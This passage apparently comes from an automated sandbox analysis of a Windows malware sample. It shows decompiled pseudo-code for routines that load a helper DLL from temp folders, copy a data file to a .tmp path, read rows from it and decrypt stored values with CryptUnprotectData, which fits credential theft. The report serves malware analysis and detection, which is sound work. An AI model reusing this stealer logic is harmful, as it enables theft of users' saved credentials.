				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}









































                                                                      0x00408324
                                                                      0x00408324
                                                                      0x00408325
                                                                      0x00408327
                                                                      0x00408329
                                                                      0x0040832b
                                                                      0x00408330
                                                                      0x00408330
                                                                      0x00408332
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408337
                                                                      0x00408338
                                                                      0x00408339
                                                                      0x0040833b
                                                                      0x00408341
                                                                      0x00408352
                                                                      0x00408353
                                                                      0x00408358
                                                                      0x0040835b
                                                                      0x0040835e
                                                                      0x00408368
                                                                      0x00408373
                                                                      0x0040837e
                                                                      0x00408389
                                                                      0x0040838e
                                                                      0x00408393
                                                                      0x00408396
                                                                      0x004083a3
                                                                      0x004083ae
                                                                      0x004083b8
                                                                      0x004083c7
                                                                      0x004083d1
                                                                      0x004083de
                                                                      0x004083eb
                                                                      0x004083f3
                                                                      0x004083f8
                                                                      0x004083fa
                                                                      0x004083fc
                                                                      0x00408401
                                                                      0x00408404
                                                                      0x00408411
                                                                      0x0040841c
                                                                      0x00408426
                                                                      0x00408435
                                                                      0x0040843f
                                                                      0x0040843f
                                                                      0x0040844d
                                                                      0x00408456
                                                                      0x00408458
                                                                      0x0040845a
                                                                      0x00408461
                                                                      0x00408475
                                                                      0x0040847c
                                                                      0x0040847c
                                                                      0x00408490
                                                                      0x004084a3
                                                                      0x004084aa
                                                                      0x004084bb
                                                                      0x004084c9
                                                                      0x004084d6
                                                                      0x004084e4
                                                                      0x004084e9
                                                                      0x004084ee
                                                                      0x004084fc
                                                                      0x00408512
                                                                      0x0040851f
                                                                      0x00408535
                                                                      0x00408542
                                                                      0x00408558
                                                                      0x00408565
                                                                      0x0040857b
                                                                      0x00408588
                                                                      0x0040859e
                                                                      0x004085ab
                                                                      0x004085c1
                                                                      0x004085ce
                                                                      0x004085e4
                                                                      0x004085f1
                                                                      0x00408607
                                                                      0x00408614
                                                                      0x0040862a
                                                                      0x00408637
                                                                      0x0040864d
                                                                      0x0040865a
                                                                      0x00408670
                                                                      0x0040867d
                                                                      0x00408693
                                                                      0x004086a0
                                                                      0x004086b6
                                                                      0x004086c2
                                                                      0x00408730
                                                                      0x00408730
                                                                      0x004086c2
                                                                      0x00408739
                                                                      0x0040873c
                                                                      0x0040873f
                                                                      0x0040874c
                                                                      0x00408759
                                                                      0x00408766
                                                                      0x00408773
                                                                      0x00408780

                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                      • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                      • String ID: %TEMP%\$%appdata%\$PATH
                                                                      • API String ID: 1998666822-1089150275
                                                                      • Opcode ID: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
                                                                      • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                      • Opcode Fuzzy Hash: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
                                                                      • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00408328 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 317libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 910 408328-40832b 911 408330-408335 910->911 911->911 912 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 911->912 939 408444-40845a 912->939 940 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 912->940 945 40845c-40847a call 4040b0 call 403d3c 939->945 946 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 939->946 940->939 945->946 970 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 946->970 971 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 946->971 970->971 1035 4086c4-4086cb 970->1035 1035->971 1036 4086cd-4086d4 1035->1036 1036->971 1037 4086d6-4086dd 1036->1037 1037->971 1038 4086df-4086e6 1037->1038 1038->971 1039 4086e8-4086ef 1038->1039 1039->971 1040 4086f1-4086f8 1039->1040 1040->971 1041 4086fa-408701 1040->1041 1041->971 1042 408703-40870a 1041->1042 1042->971 1043 40870c-408713 1042->1043 1043->971 1044 408715-40871c 1043->1044 1044->971 1045 40871e-408725 1044->1045 1045->971 1046 408727-40872e 1045->1046 1046->971 1047 408730 1046->1047 1047->971
                                                                      C-Code - Quality: 74%
                                                                      			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t100;
				struct HINSTANCE__* _t114;
				intOrPtr* _t208;
				void* _t223;
				intOrPtr _t241;
				void* _t267;
				intOrPtr _t269;
				intOrPtr _t270;

				_t266 = __esi;
				_t269 = _t270;
				_t223 = 0xd;
				do {
					_push(0);
					_push(0);
					_t223 = _t223 - 1;
					_t271 = _t223;
				} while (_t223 != 0);
				_push(_t223);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t269);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t270;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t271);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
				_t93 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t272 = _t93;
				if(_t93 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t272);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
				}
				_t94 =  *0x41b578; // 0x41c6b0
				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
				_t273 = _t267;
				if(_t267 > 0) {
					E004040B0( &_v12, _t267);
					_t208 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
				}
				E00403E1C();
				_t100 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
				_t114 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t114;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t241);
				 *[fs:eax] = _t241;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}








































                                                                      0x00408328
                                                                      0x00408329
                                                                      0x0040832b
                                                                      0x00408330
                                                                      0x00408330
                                                                      0x00408332
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408334
                                                                      0x00408337
                                                                      0x00408338
                                                                      0x00408339
                                                                      0x0040833b
                                                                      0x00408341
                                                                      0x00408352
                                                                      0x00408353
                                                                      0x00408358
                                                                      0x0040835b
                                                                      0x0040835e
                                                                      0x00408368
                                                                      0x00408373
                                                                      0x0040837e
                                                                      0x00408389
                                                                      0x0040838e
                                                                      0x00408393
                                                                      0x00408396
                                                                      0x004083a3
                                                                      0x004083ae
                                                                      0x004083b8
                                                                      0x004083c7
                                                                      0x004083d1
                                                                      0x004083de
                                                                      0x004083eb
                                                                      0x004083f3
                                                                      0x004083f8
                                                                      0x004083fa
                                                                      0x004083fc
                                                                      0x00408401
                                                                      0x00408404
                                                                      0x00408411
                                                                      0x0040841c
                                                                      0x00408426
                                                                      0x00408435
                                                                      0x0040843f
                                                                      0x0040843f
                                                                      0x0040844d
                                                                      0x00408456
                                                                      0x00408458
                                                                      0x0040845a
                                                                      0x00408461
                                                                      0x00408475
                                                                      0x0040847c
                                                                      0x0040847c
                                                                      0x00408490
                                                                      0x004084a3
                                                                      0x004084aa
                                                                      0x004084bb
                                                                      0x004084c9
                                                                      0x004084d6
                                                                      0x004084e4
                                                                      0x004084e9
                                                                      0x004084ee
                                                                      0x004084fc
                                                                      0x00408512
                                                                      0x0040851f
                                                                      0x00408535
                                                                      0x00408542
                                                                      0x00408558
                                                                      0x00408565
                                                                      0x0040857b
                                                                      0x00408588
                                                                      0x0040859e
                                                                      0x004085ab
                                                                      0x004085c1
                                                                      0x004085ce
                                                                      0x004085e4
                                                                      0x004085f1
                                                                      0x00408607
                                                                      0x00408614
                                                                      0x0040862a
                                                                      0x00408637
                                                                      0x0040864d
                                                                      0x0040865a
                                                                      0x00408670
                                                                      0x0040867d
                                                                      0x00408693
                                                                      0x004086a0
                                                                      0x004086b6
                                                                      0x004086c2
                                                                      0x00408730
                                                                      0x00408730
                                                                      0x004086c2
                                                                      0x00408739
                                                                      0x0040873c
                                                                      0x0040873f
                                                                      0x0040874c
                                                                      0x00408759
                                                                      0x00408766
                                                                      0x00408773
                                                                      0x00408780

                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                      • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                      • String ID: %TEMP%\$%appdata%\$PATH
                                                                      • API String ID: 1998666822-1089150275
                                                                      • Opcode ID: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
                                                                      • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                                                                      • Opcode Fuzzy Hash: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
                                                                      • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004095A4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 49%
                                                                      			E004095A4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr* _t79;
				WCHAR* _t94;
				void* _t107;
				intOrPtr* _t126;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t134;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr _t193;
				void* _t201;
				intOrPtr _t212;
				void* _t219;
				intOrPtr _t228;
				intOrPtr _t229;
				void* _t230;
				void* _t231;

				_t226 = __esi;
				_t225 = __edi;
				_t191 = __ebx;
				_t228 = _t229;
				_push(__ecx);
				_t193 = 0xb;
				do {
					_push(0);
					_push(0);
					_t193 = _t193 - 1;
					_t234 = _t193;
				} while (_t193 != 0);
				_t1 =  &_v8;
				 *_t1 = _t193;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				 *[fs:eax] = _t229;
				E004034E4( &_v36);
				_t79 =  *0x41b580; // 0x41c6c4
				E00406FDC( *((intOrPtr*)( *_t79))( *[fs:eax], 0x409857, _t228, __ebx), __ebx,  &_v56, __esi, _t234);
				_push(_v56);
				E00406F1C( &_v60, __ebx, __edi, __esi, _t234);
				_push(_v60);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, __ebx,  &_v48, _t234);
				E004062D8(L"%TEMP%",  &_v68, _t234);
				_push(_v68);
				_push(0x409890);
				_push(_v44);
				E00403E1C();
				E0040781C(_v64, _t191,  &_v52, _t234);
				_t94 = E00403D3C(_v52);
				CopyFileW(E00403D3C(_v48), _t94, 0xffffffff); // executed
				E0040377C( &_v72, _v52);
				E00404AFC(_v72, _t191,  *_t1,  &_v40, __esi, _t234);
				E00403D2C( &_v76, _v40);
				_t107 = E004076B0(_v76, _t191,  *_t1); // executed
				if(_t107 != 0) {
					_t126 =  *0x41b55c; // 0x41c784
					_t128 =  *((intOrPtr*)( *_t126))(E00403990(_v40),  &_v20); // executed
					_t230 = _t229 + 8;
					if(_t128 == 0) {
						E00408120(0x62,  &_v80);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v20, E00403990(_v80), 0xffffffff,  &_v24,  &_v28); // executed
						_t231 = _t230 + 0x14;
						if(_t153 == 0) {
							while(1) {
								_push(_v24);
								_t155 =  *0x41b600; // 0x41c790
								if( *((intOrPtr*)( *_t155))() != 0x64) {
									goto L9;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v24, 2,  *((intOrPtr*)( *_t159))(_v24, 2));
								_t231 = _t231 + 0x10;
								_pop(_t219);
								E004094C4(_t165,  &_v32, _t219);
								_t168 = E00403790(_v32);
								__eflags = _t168;
								if(_t168 != 0) {
									_t170 =  *0x41b588; // 0x41c794
									E004036DC( &_v84,  *((intOrPtr*)( *_t170))(_v24, 1));
									E0040377C( &_v88, _v12);
									_t181 =  *0x41b588; // 0x41c794
									_t183 =  *((intOrPtr*)( *_t181))(_v24, 0, _v88, _v32, _v84);
									_t231 = _t231 + 0x10;
									E004036DC( &_v92, _t183);
									_push(_v92);
									E0040377C( &_v96, _v16);
									_pop(_t201);
									E00405210(0x40989c, _t191, _t201, _v96, _t225, _t226);
								}
							}
						}
					}
					L9:
					_t130 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t130))(_v24);
					_t134 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t134))(_v20); // executed
					E00403D2C(_a4, _v36);
					DeleteFileW(E00403D3C(_v52)); // executed
				}
				_pop(_t212);
				 *[fs:eax] = _t212;
				_push(E0040985E);
				E00403508( &_v96, 5);
				E00403B80( &_v76);
				E004034E4( &_v72);
				E00403B98( &_v68, 7);
				E004034E4( &_v40);
				E00403508( &_v36, 2);
				return E00403B98( &_v16, 3);
			}



















































                                                                      0x004095a4
                                                                      0x004095a4
                                                                      0x004095a4
                                                                      0x004095a5
                                                                      0x004095a7
                                                                      0x004095a8
                                                                      0x004095ad
                                                                      0x004095ad
                                                                      0x004095af
                                                                      0x004095b1
                                                                      0x004095b1
                                                                      0x004095b1
                                                                      0x004095b4
                                                                      0x004095b4
                                                                      0x004095b8
                                                                      0x004095bb
                                                                      0x004095be
                                                                      0x004095c4
                                                                      0x004095cc
                                                                      0x004095d4
                                                                      0x004095e4
                                                                      0x004095ea
                                                                      0x004095ef
                                                                      0x004095fb
                                                                      0x00409600
                                                                      0x00409606
                                                                      0x0040960b
                                                                      0x0040960e
                                                                      0x0040961b
                                                                      0x00409626
                                                                      0x00409633
                                                                      0x00409638
                                                                      0x0040963b
                                                                      0x00409640
                                                                      0x0040964b
                                                                      0x00409656
                                                                      0x00409660
                                                                      0x00409676
                                                                      0x0040967e
                                                                      0x00409689
                                                                      0x00409694
                                                                      0x0040969c
                                                                      0x004096a3
                                                                      0x004096b6
                                                                      0x004096bd
                                                                      0x004096bf
                                                                      0x004096c4
                                                                      0x004096dc
                                                                      0x004096ee
                                                                      0x004096f5
                                                                      0x004096f7
                                                                      0x004096fc
                                                                      0x004097ad
                                                                      0x004097b0
                                                                      0x004097b1
                                                                      0x004097be
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040970d
                                                                      0x00409720
                                                                      0x00409727
                                                                      0x00409729
                                                                      0x0040972f
                                                                      0x00409730
                                                                      0x00409738
                                                                      0x0040973d
                                                                      0x0040973f
                                                                      0x00409747
                                                                      0x00409758
                                                                      0x0040976b
                                                                      0x0040977a
                                                                      0x00409781
                                                                      0x00409783
                                                                      0x0040978b
                                                                      0x00409793
                                                                      0x0040979a
                                                                      0x004097a7
                                                                      0x004097a8
                                                                      0x004097a8
                                                                      0x0040973f
                                                                      0x004097ad
                                                                      0x004096fc
                                                                      0x004097c4
                                                                      0x004097c8
                                                                      0x004097cf
                                                                      0x004097d6
                                                                      0x004097dd
                                                                      0x004097e6
                                                                      0x004097fb
                                                                      0x004097fb
                                                                      0x004097ff
                                                                      0x00409802
                                                                      0x00409805
                                                                      0x00409812
                                                                      0x0040981a
                                                                      0x00409822
                                                                      0x0040982f
                                                                      0x00409837
                                                                      0x00409844
                                                                      0x00409856

                                                                      APIs
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                        • Part of subcall function 004094C4: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                        • Part of subcall function 004094C4: LocalFree.KERNEL32(?), ref: 0040950A
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 004097FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCryptDataDeleteFreeLocalUnprotect
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 691380987-3650661790
                                                                      • Opcode ID: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
                                                                      • Instruction ID: 0066d1c1be5024352ad70b1cbef22ae6b56226110b13b2bd45aebffaaabcbc52
                                                                      • Opcode Fuzzy Hash: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
                                                                      • Instruction Fuzzy Hash: 3981A471A10109AFDB00EB99D881E9EB7B9EF48304F108576F514F72A2DA39AE058B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1295 40955e-409567 1296 409583 1295->1296 1297 409569-40957e LoadLibraryA GetProcAddress 1295->1297 1297->1296
                                                                      C-Code - Quality: 100%
                                                                      			E0040955E() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41c7cc =  *0x41c7cc - 1;
				if( *0x41c7cc < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41c7c8 = _t3;
					return _t3;
				}
				return _t1;
			}






                                                                      0x00409560
                                                                      0x00409567
                                                                      0x00409573
                                                                      0x00409579
                                                                      0x0040957e
                                                                      0x00000000
                                                                      0x0040957e
                                                                      0x00409583

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                                                                      • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: CryptUnprotectData$crypt32.dll
                                                                      • API String ID: 2574300362-1827663648
                                                                      • Opcode ID: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
                                                                      • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                      • Opcode Fuzzy Hash: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
                                                                      • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1298 401870-401892 RtlInitializeCriticalSection 1299 401894-401899 RtlEnterCriticalSection 1298->1299 1300 40189e-4018d4 call 401234 * 3 LocalAlloc 1298->1300 1299->1300 1307 401905-401919 1300->1307 1308 4018d6 1300->1308 1312 401925 1307->1312 1313 40191b-401920 RtlLeaveCriticalSection 1307->1313 1309 4018db-4018ed 1308->1309 1309->1309 1311 4018ef-4018fe 1309->1311 1311->1307 1313->1312
                                                                      C-Code - Quality: 68%
                                                                      			E00401870() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x41c5b4);
				L004011C4();
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x41c60c = _t11;
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0xe48210
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
